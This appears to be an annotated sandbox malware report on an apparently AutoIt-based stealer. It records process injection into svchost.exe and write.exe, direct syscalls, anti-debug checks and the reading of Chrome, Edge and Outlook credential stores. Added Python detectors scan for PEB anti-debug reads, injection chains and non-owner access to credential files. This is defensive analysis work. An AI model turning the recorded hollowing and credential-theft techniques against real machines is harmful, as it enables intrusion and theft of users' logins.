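The fs:[00000030h] reads listed above load the PEB base pointer (on 32-bit Windows the TEB at fs:0 stores it at offset 0x30). That load by itself is common in benign runtime code; what makes it an anti-debug indicator is which PEB field is dereferenced next: BeingDebugged at +0x02 (the same byte IsDebuggerPresent returns), or NtGlobalFlag at +0x68 (the heap debug flags 0x70 set when a process is started under a debugger). The scanner below is an added example, not part of the Joe Sandbox report: it finds the common byte encodings of the PEB load in a code buffer and resolves the field accessed through the loaded register within the following bytes. The byte buffer is hand-assembled for the example, not bytes from the analysed sample; the field offsets are the documented 32-bit PEB layout.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit PEB field offsets (documented layout); the scanner reports which one
# the code dereferences right after loading the PEB pointer.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# "mov r32, dword ptr fs:[0x30]" in its two common encodings: the short moffs32
# form for eax (64 A1 30 00 00 00) and the modrm form for any register
# (64 8B /r with a disp32-only modrm byte 05/0D/15/.../3D, reg in bits 3-5).
PEB_READ = re.compile(rb"\x64(?:\xa1|\x8b([\x05\x0d\x15\x1d\x25\x2d\x35\x3d]))\x30\x00\x00\x00")

# Constructed sample: hand-assembled x86 bytes modelling the pattern the report
# lists for svchost.exe; not bytes taken from the analysed binary.
SAMPLE = bytes.fromhex(
    "55 8b ec"               # push ebp; mov ebp, esp
    "64 a1 30 00 00 00"      # mov eax, dword ptr fs:[30h]    (PEB pointer)
    "0f b6 40 02"            # movzx eax, byte ptr [eax+2]    (PEB.BeingDebugged)
    "85 c0 75 05"            # test eax, eax; jnz short
    "64 8b 0d 30 00 00 00"   # mov ecx, dword ptr fs:[30h]
    "8b 41 68"               # mov eax, [ecx+68h]             (PEB.NtGlobalFlag)
    "a9 70 00 00 00"         # test eax, 70h                  (heap debug flags)
    "64 8b 35 30 00 00 00"   # mov esi, dword ptr fs:[30h]
    "8b 46 0c"               # mov eax, [esi+0Ch]             (PEB.Ldr)
    "5d c3"                  # pop ebp; ret
)


@dataclass
class PebRead:
    offset: int            # offset of the fs:[30h] load in the buffer
    reg: str               # register that receives the PEB pointer
    field: Optional[str]   # PEB field dereferenced through that register, if recognised


def _field_after(buf: bytes, start: int, reg_idx: int, window: int = 16) -> Optional[str]:
    """Find mov r8/r32,[reg+disp8] or movzx r32,byte [reg+disp8] using the PEB register."""
    end = min(len(buf) - 2, start + window)
    i = start
    while i < end:
        if buf[i] in (0x8A, 0x8B):                                   # mov r, [reg+disp8]
            modrm, disp = buf[i + 1], buf[i + 2]
        elif buf[i:i + 2] == b"\x0f\xb6" and i + 3 < len(buf):       # movzx r32, byte [reg+disp8]
            modrm, disp = buf[i + 2], buf[i + 3]
        else:
            i += 1
            continue
        # mod == 01 (disp8), rm == the register holding the PEB, known field offset
        if (modrm >> 6) == 1 and (modrm & 7) == reg_idx and disp in PEB_FIELDS:
            return PEB_FIELDS[disp]
        i += 1
    return None


def scan_peb_reads(buf: bytes) -> List[PebRead]:
    """Every fs:[30h] load in the buffer, with the PEB field read through it (if any)."""
    hits = []
    for m in PEB_READ.finditer(buf):
        reg_idx = 0 if m.group(1) is None else (m.group(1)[0] >> 3) & 7
        hits.append(PebRead(m.start(), REGS[reg_idx], _field_after(buf, m.end(), reg_idx)))
    return hits


def summarize(buf: bytes) -> Dict[str, int]:
    """Count of PEB reads per resolved field; 'unresolved' when no known field follows."""
    counts: Dict[str, int] = {}
    for h in scan_peb_reads(buf):
        key = h.field or "unresolved"
        counts[key] = counts.get(key, 0) + 1
    return counts
```

Triage on the resolved field rather than on the load alone: PEB.Ldr and PEB.ProcessHeap reads are what loaders and the CRT do legitimately, while BeingDebugged and NtGlobalFlag reads next to a conditional branch are the IsDebuggerPresent-equivalent checks the report flags. A real scan should run over executable sections of the unpacked image, not the packed file on disk.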

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Direct / indirect syscalls, each with the address the report records in its "Direct from" field:
    NtWriteVirtualMemory: Direct from: 0x76F0490C
    NtAllocateVirtualMemory: Direct from: 0x76F03C9C
    NtClose: Direct from: 0x76F02B6C
    NtReadVirtualMemory: Direct from: 0x76F02E8C
    NtCreateKey: Direct from: 0x76F02C6C
    NtSetInformationThread: Direct from: 0x76F02B4C
    NtQueryAttributesFile: Direct from: 0x76F02E6C
    NtAllocateVirtualMemory: Direct from: 0x76F048EC
    NtQuerySystemInformation: Direct from: 0x76F048CC
    NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
    NtOpenSection: Direct from: 0x76F02E0C
    NtSetInformationThread: Direct from: 0x76EF63F9
    NtDeviceIoControlFile: Direct from: 0x76F02AEC
    NtAllocateVirtualMemory: Direct from: 0x76F02BEC
    NtCreateFile: Direct from: 0x76F02FEC
    NtOpenFile: Direct from: 0x76F02DCC
    NtQueryInformationToken: Direct from: 0x76F02CAC
    NtTerminateThread: Direct from: 0x76F02FCC
    NtClose: Direct from: 0x76EF7B2E
    NtOpenKeyEx: Direct from: 0x76F02B9C
    NtProtectVirtualMemory: Direct from: 0x76F02F9C
    NtSetInformationProcess: Direct from: 0x76F02C5C
    NtNotifyChangeKey: Direct from: 0x76F03C2C
    NtCreateMutant: Direct from: 0x76F035CC
    NtWriteVirtualMemory: Direct from: 0x76F02E3C
    NtMapViewOfSection: Direct from: 0x76F02D1C
    NtResumeThread: Direct from: 0x76F036AC
    NtAllocateVirtualMemory: Direct from: 0x76F02BFC
    NtReadFile: Direct from: 0x76F02ADC
    NtQuerySystemInformation: Direct from: 0x76F02DFC
    NtDelayExecution: Direct from: 0x76F02DDC
    NtQueryInformationProcess: Direct from: 0x76F02C26
    NtResumeThread: Direct from: 0x76F02FBC
    NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe protection: read write
Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\write.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\write.exe | Thread register set: target process: 5024
Source: C:\Windows\SysWOW64\write.exe | Thread APC queued: target process: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 63C008
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0043916A LogonUserW
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\r6lOHDg9N9.exe"
Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe | Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: r6lOHDg9N9.exe, fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: r6lOHDg9N9.exe | Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: fZXsbVktlmkz.exe, 00000005.00000000.2014971988.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000005.00000002.3551828694.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3551897356.0000000000CD0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_00410D10 cpuid
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004711D2 GetUserNameW
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
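Read together, the section-mapping, memory-write, APC and process-creation entries above give the injection chain: r6lOHDg9N9.exe creates svchost.exe with its own command line, writes into it and maps an executable section into it; svchost.exe maps executable sections into fZXsbVktlmkz.exe and write.exe; write.exe maps into fZXsbVktlmkz.exe and firefox.exe, sets a thread context and queues an APC; and fZXsbVktlmkz.exe issues its Nt* calls as direct syscalls. The parser below is an added example, not Joe Sandbox code: it takes event lines in the glued form the page shows, builds the source-to-target graph, lists executable remote mappings, flags parent/child pairs where the parent both created the child and tampered with its memory (the process-hollowing pattern, which the first hop matches), and counts the distinct direct syscalls per image. The sample is a subset of the report's own lines; the function names and the "execute in protection" criterion are this example's choices.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Process images exactly as the report prints them.
SRC = r"C:\Users\user\Desktop\r6lOHDg9N9.exe"
SVC = r"C:\Windows\SysWOW64\svchost.exe"
WRT = r"C:\Windows\SysWOW64\write.exe"
FFX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
INJ = r"C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe"

# Constructed sample: a subset of the report's event lines, kept in the glued
# form the page shows (source path immediately followed by the event name).
SAMPLE_EVENTS = [
    f'Source: {SRC}Process created: {SVC} "{SRC}"',
    f"Source: {SRC}Memory written: {SVC} base: 63C008",
    f"Source: {SRC}Section loaded: NULL target: {SVC} protection: execute and read and write",
    f"Source: {SVC}Section loaded: NULL target: {INJ} protection: execute and read and write",
    f"Source: {SVC}Section loaded: NULL target: {WRT} protection: execute and read and write",
    f'Source: {INJ}Process created: {WRT} "{WRT}"',
    f"Source: {WRT}Section loaded: NULL target: {INJ} protection: read write",
    f"Source: {WRT}Section loaded: NULL target: {FFX} protection: execute and read and write",
    f"Source: {WRT}Thread APC queued: target process: {INJ}",
    f"Source: {INJ}NtWriteVirtualMemory: Direct from: 0x76F0490C",
    f"Source: {INJ}NtMapViewOfSection: Direct from: 0x76F02D1C",
    f"Source: {INJ}NtResumeThread: Direct from: 0x76F036AC",
    f"Source: {INJ}NtCreateUserProcess: Direct from: 0x76F0371C",
]

# The source path ends at the first ".exe"; the event name follows with no separator.
LINE = re.compile(
    r"^Source: (?P<src>.+?\.exe)"
    r"(?P<event>Section loaded|Process created|Thread APC queued|Memory written|Nt[A-Za-z]+)"
    r": (?P<rest>.*)$"
)
TARGET = {
    "Section loaded": re.compile(r"NULL target: (?P<tgt>.+?\.exe) protection: (?P<detail>.+)"),
    "Process created": re.compile(r'(?P<tgt>.+?\.exe) "(?P<detail>.*)"'),
    "Memory written": re.compile(r"(?P<tgt>.+?\.exe) base: (?P<detail>\w+)"),
    "Thread APC queued": re.compile(r"target process: (?P<tgt>.+)"),
}
Edge = Tuple[str, str, str]  # (event, target image, detail such as the protection string)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def parse_events(lines: List[str]):
    """Return (edges, syscalls): image -> {(event, target, detail)} and image -> {Nt* names}."""
    edges: Dict[str, Set[Edge]] = defaultdict(set)
    syscalls: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        src, event, rest = basename(m.group("src")), m.group("event"), m.group("rest")
        if event.startswith("Nt"):
            syscalls[src].add(event)
            continue
        t = TARGET[event].match(rest)
        if t:
            edges[src].add((event, basename(t.group("tgt")), t.groupdict().get("detail") or ""))
    return edges, syscalls


def reachable(edges: Dict[str, Set[Edge]], root: str) -> List[str]:
    """Every image the root reaches, transitively, through any event kind."""
    seen: Set[str] = set()
    stack = [root]
    while stack:
        for _, tgt, _ in edges.get(stack.pop(), ()):
            if tgt != root and tgt not in seen:
                seen.add(tgt)
                stack.append(tgt)
    return sorted(seen)


def rwx_remote_maps(edges: Dict[str, Set[Edge]]) -> List[Tuple[str, str]]:
    """Sections mapped into a different process with execute permission: the injection hops."""
    return sorted((src, tgt) for src, evs in edges.items()
                  for ev, tgt, prot in evs
                  if ev == "Section loaded" and "execute" in prot and tgt != src)


def hollowing_candidates(edges: Dict[str, Set[Edge]]) -> List[Tuple[str, str]]:
    """Parents that created a child and also wrote to it or mapped executable memory into it."""
    out = []
    for src, evs in edges.items():
        created = {tgt for ev, tgt, _ in evs if ev == "Process created"}
        tampered = {tgt for ev, tgt, prot in evs
                    if ev == "Memory written" or (ev == "Section loaded" and "execute" in prot)}
        out.extend((src, tgt) for tgt in created & tampered)
    return sorted(out)


def direct_syscall_counts(syscalls: Dict[str, Set[str]]) -> Dict[str, int]:
    """Distinct Nt* functions per image among the calls the report flags as direct syscalls."""
    return {src: len(names) for src, names in syscalls.items()}
```

The same graph logic applies to EDR telemetry that records remote section maps, cross-process writes and process creation: a hop whose target is a signed system binary (svchost.exe, write.exe) launched with the parent's own command line, followed by an executable mapping into it, is the hollowing signal regardless of which API the sample used to get there.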

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: r6lOHDg9N9.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: r6lOHDg9N9.exe | Binary or memory string: WIN_XP
Source: r6lOHDg9N9.exe | Binary or memory string: WIN_XPe
Source: r6lOHDg9N9.exe | Binary or memory string: WIN_VISTA
Source: r6lOHDg9N9.exe | Binary or memory string: WIN_7
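write.exe (the WordPad launcher, which has no reason to touch browser profiles) opens the Chrome and Edge Login Data, Cookies, Web Data and Local State files and the Outlook profile key. The detection is the pairing, a process that is not the store's owner touching several credential stores in one session, not any single file open. The detector below is an added example, not part of the report: it runs over "File opened" / "Key opened" lines in the page's format, names the store each path belongs to, compares the opening image against a small owner allow-list, and aggregates per process. The allow-list, the benign notes.rtf line and the chrome.exe line are constructed for contrast; the Outlook key is written without the trailing backslash the report prints.

```python
import re
from typing import Dict, List, Optional, Tuple

# Credential stores and the images that legitimately open them. The owner
# allow-list is an assumption made for this example; extend it per environment.
CREDENTIAL_STORES = [
    (re.compile(r"\\Google\\Chrome\\User Data\\(?:.*\\)?(?:Login Data|Web Data|Cookies|Local State)$", re.I),
     "Chrome", {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\(?:.*\\)?(?:Login Data|Web Data|Cookies|Local State)$", re.I),
     "Edge", {"msedge.exe"}),
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles(?:\\|$)", re.I),
     "Outlook profile", {"outlook.exe"}),
]

# Constructed sample: report lines in the page's glued form, plus one benign
# file open and one legitimate browser access for contrast.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\Documents\notes.rtf",
]

# Image path ends at the first ".exe"; the event kind follows with no separator.
LINE = re.compile(r"^Source: (?P<image>.+?\.exe)(?P<kind>File opened|Key opened): (?P<obj>.+)$")


def classify(image: str, obj: str) -> Optional[Tuple[str, str]]:
    """(store, 'expected'|'suspicious') when `obj` is a credential store, else None."""
    name = image.rsplit("\\", 1)[-1].lower()
    for pattern, store, owners in CREDENTIAL_STORES:
        if pattern.search(obj):
            return (store, "expected" if name in owners else "suspicious")
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(process, store, severity) for every line that touches a credential store."""
    out = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        verdict = classify(m.group("image"), m.group("obj"))
        if verdict:
            out.append((m.group("image").rsplit("\\", 1)[-1], verdict[0], verdict[1]))
    return out


def suspicious_processes(lines: List[str]) -> Dict[str, List[str]]:
    """Distinct stores each non-owner process touched; several per process is the stealer pattern."""
    agg: Dict[str, set] = {}
    for proc, store, severity in scan(lines):
        if severity == "suspicious":
            agg.setdefault(proc, set()).add(store)
    return {proc: sorted(stores) for proc, stores in agg.items()}
```

The same logic applies to any telemetry that records the opening image together with the object opened (EDR file and registry events, other sandbox reports); the allow-list is the part that needs tuning, since backup agents and password managers will also open these files legitimately.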

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3550976082.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3554169610.0000000004A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2094255182.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3551036891.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2094963366.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3552180620.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2093329149.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3550782278.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\r6lOHDg9N9.exe | Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
MITRE ATT&CK matrix, one line per tactic, techniques in the order the report's columns list them (a number in front of a technique is reproduced as the report shows it; techniques without a number are the matrix's unmatched entries):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
